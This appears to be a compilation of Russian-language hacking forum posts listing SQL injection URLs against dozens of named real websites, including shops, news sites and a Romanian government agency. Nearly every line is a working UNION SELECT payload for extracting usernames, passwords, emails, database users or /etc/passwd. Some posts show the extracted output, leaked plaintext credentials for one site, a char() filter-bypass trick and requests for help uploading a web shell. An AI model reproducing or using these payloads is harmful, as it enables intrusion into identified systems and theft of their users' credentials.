http://www.ai-petri.com/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,password)+from+users/* _________________________________ http://www.t-avia.ru/index.php?_a=actions&type=article&id=-355+union+select+1,concat_ws(0x3a,user_LOGIN,user_PASSWORD,user_EMAIL),3,4,5+from+users/* _________________________________ http://www.saabfir.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,password)+from+users/* _________________________________ http://www.armdecor.ru/index.php?m=29&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,password)+from+users/* _________________________________ http://creazionifranca.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,login,password,Email)+from+users/* _________________________________ http://www.papinbag.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,password)+from+users/* _________________________________ а это виновник всего этого безобразия :-D http://www.exs.cc/index.php?m=46&a=news&id=-471+union+select+concat(login,0x3a,password,0x3a,Email,0x3a,Icq)+from+users+limit+1,1/*
HTML: http://www.fundsnetservices.com/searchresult.php?sbcat_id=-6+UNION+SELECT+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin/* БД 4
Такое впечитление что это писал один и тот же человек... Code: http://www.kalendar-press.ru/links.php?part_id=-5+union+select+VERSION()/* Code: http://mostest.ru/links.php?part_id=-15+union+select+VERSION()/* Code: http://www.claycy.ru/links.php?part_id=-34+union+select+VERSION()/* Code: http://www.tecckom.ru/links.php?part_id=-33+union+select+VERSION()/* Code: http://global-star.ru/links.php?part_id=-32+union+select+VERSION()/* Code: http://www.antron-tek.ru/links.php?part_id=-8+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/* http://www.antron-tek.ru/links.php?part_id=-8+union+select+concat_ws(0x2F,LOAD_FILE('/etc/passwd'))+from+mysql.user/* http://www.antron-tek.ru/links.php?part_id=-8+union+select+concat_ws(0x2F,user,password)+from+mysql.user+limit+1,3/*
Известный канал на кабельнос телевидении TDK 5 версия БД HTML: http://www.tdktv.ru/index.php?menu=program&id=-9+UNION+SELECT+1,concat(username,0x3a,user_password,0x3a,user_icq,0x3a,user_email,0x3a,user_aim,0x3a,user_yim,0x3a,user_msnm,0x3a,user_occ),3+FROM+phpbb_users/* ДБ 4 HTML: http://www.debinnenvaart.nl/schependb/inhoud.php?action=tel&id=-6899'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,USER(),19,20,21,DATABASE(),VERSION(),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155/* 4ДБ нашёл только 2 таблицы news и products HTML: http://fotosale.com.ua/index.php?mod=prod&cid=1&bid=1&pid=471+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
HTML: http://www.animalsasia.org/index.php?module=3&menupos=10+UNION+SELECT+1,2,3,4,5,6,concat(user,0x3a,password),8,9,10,11,12,13,14+FROM+mysql.user/* БД 4
anad.gov.ro - Национальное Румынское Анти-допинговое Агенство Code: http://www.anad.gov.ro/html/ro/presa_comunicate.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6/* 5.0.32-Debian_7etch1-log:db_anad:[email protected] Доступна только одна таблица : Code: comunicate
Code: http://www.kontenental.ru/index.php?page_id=-146+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16/* 5.0.27-standard master74_setiriba master74_setirib@localhost Code: http://www.kontenental.ru/index.php?page_id=-146+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,table_name),13,14,15,16+from+information_schema.tables+limit+5,10/*
Ultimate Frisbee Code: http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,version()/* 5.0.27-log Code: http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,Table_name+from+information_schema.tables/* есть доступ к information_schema.tables интересные таблицы admins news ULTM_players players
Бага в юнекте (кто в танке - вот идешь ты пополнять баланс, а тут юнект...). Нашел Ув. Товарищ Dj_Bes и выложил в болталке за что очень несправедливо получил кучу брани в свой адрес. Инъекцию выкладывал не разработанную, я довел ее до ума, вот результаты: 5.0.40-log;unactpay@pechkin;unactpay_db http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.tables+LIMIT+1,1/* таблицы походу такие: file menu news offices order_rent page partners provider terminal terminal_category terminal_type filepriv не позволяет проводить операции с файлами =\.
З.Ы. Блин забыл - интересна табличка order_rent , я не вкурил кем она заполняеться но судя по названия (order - приказывать, но можно здесь перевести и как заказ) это табличка заказов. Это походу единственное что заслуживает внимания - http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,name,12,13+FROM+order_rent/* например так. Кодеры - явно барыги и добавили какую то кривую защиту. Т.е. для подбора имен полей пользоваться банальным WHERE+TABLE_NAME='vasya_pupkin' нельзя, нужно воспользоваться функцией char(), т.е. например WHERE+TABLE_NAME='vasya_pupkin' прерращаеться в WHERE+TABLE_NAME=char(118,97,115,121,97,95,112,117,112,107,105,110)
HTML: http://www.posibila.ro/index.php?ce=artisti&id=116+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* БД 4
Code: http://frozenfoods.ru/links.php?part_id=-27+union+select+login+from+users/* Пользователи. admin:yjvekg12 frozenfoods:irishka buyer:enter шелл залить не получаеться /www/vhosts/frozenfoods.ru/html/func/admin.inc
Все скули ищутся вручную, или в частных случаях, самописными приватными программами, которые никто никогда не даст. PS: БД5. Если кто шелл зальет стукните в аську
http://www.fwdshop.ru/ - молодежная одежда, оптовая торговля Code: http://www.fwdshop.ru/index.php?gallery=-1+union+SELECT+1,concat_ws(char(58,58),user_id,user_email,password,password2)+FROM+fwd_users/* Через limit перебираем пользователей. Позабавило то, что в поле password2 лежит зашифрованый пароль, а в password - в открытом виде, всегда бы так
Разбираем Code: http://www.football-equipment-uk.com/links.php?link_id=-99%20union%20select%201,2,3,4,5,6,7,8,9/* Code: http://www.vernunft-schweiz.ch/links.php?link_id=-999+union+select+1,2,3,4,5,6/* Code: http://danilka.com/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9/* Code: http://www.litriocht.com/shop/links.php?link_id=-999+union+select+1,2,version(),user(),5,6,7,8,9/* Code: http://www.dsp-es.com/vshop/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/* Code: http://www.lickscycles.com/catalog/links.php?link_id=-999+union+select+version(),2,database(),user(),5,6,7,8,9,10/* Code: http://www.eoilcandles.com/catalog/links.php?link_id=-999+union+select+version(),2,database(),user(),5,6,7,8,9,10/*
http://www.thecorporatelibrary.com/ Code: http://www.thecorporatelibrary.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58),user_id,username,pword),10,11,12,13,14,15,16,17,18+from+users/* Перебираем лимитом... http://www.btleague.net/ Что-то напоминающее примитивную онлайн игру, но я так и не разобрался, не силен я в итальянском.... Code: http://www.btleague.net/info.asp?id=1+or+1=(SELECT+TOP+1+usuario+FROM+USUARIO)-- Code: http://www.btleague.net/info.asp?id=1+or+1=(SELECT+TOP+1+passw+FROM+USUARIO)-- Все колонки таблицы USUARIO: 'id_usuario','passw','fecha_registro','ultimo_login','email','usuario','imagen','bot','region','pais','zona','ip_registro','activo','GM' Таблицы: 'HISTORIAL_ECONOMICO','TIPO_CRIATURA','TIPO_GUARIDA','GUARIDA','POBLADO','CAMPAMENTO','TIPO_INFRAESTRUCTURA','kill_kk','INFRAESTRUCTURAS','OBRAS','HABITANTES','ESTADISTICA_USUARIO','EJERCITOS','LEADER','EJERCITO','CORREO','RETO','BATALLA','COMENTARIOS','SUCESOS','REQUISITOS','NOTICIAS','TROFEO','PRISIONEROS_IP','TIPO_OFICIO','TRABAJADORES','FABRICA','CONTROL','PAQUETES','PAQUETE','LIGAS','PARTIDOS','CLASIFICACION','BTLEAGUE','GRUPOS','ACTA','USUARIO','PROPIEDADES_USUARIO','VASALLOS'
http://www.folgreb.ru/news/article.php?id=-21+union+select+1,concat_ws(0x3a,version(),%20%20database(),user()),3,4,5,6,7,8,9,10,11,12,13/* 5.0.45:folgrebru_site:[email protected]
intercer.net Code: http://www.intercer.net/newstext.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.1.22-standard:intercer_su:intercer_su@localhost
adventistmuntenia.ro Code: http://www.adventistmuntenia.ro/newstext.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* 4.0.27-standard-log:muntenia_su:muntenia_su@localhost
arhitectura1906.ro Code: http://www.arhitectura1906.ro/newsdetail.php?id_nws=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16/* 4.1.22-standard:usr_web15_2:web15@localhost romanialibera.com Code: http://www.romanialibera.com/articole/articol.php?care=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x3a,version(),database(),user())/* 4.1.20:romanialibera_com:rldbadmin@localhost Нашёл таблу useri, а в ней одно поле - email
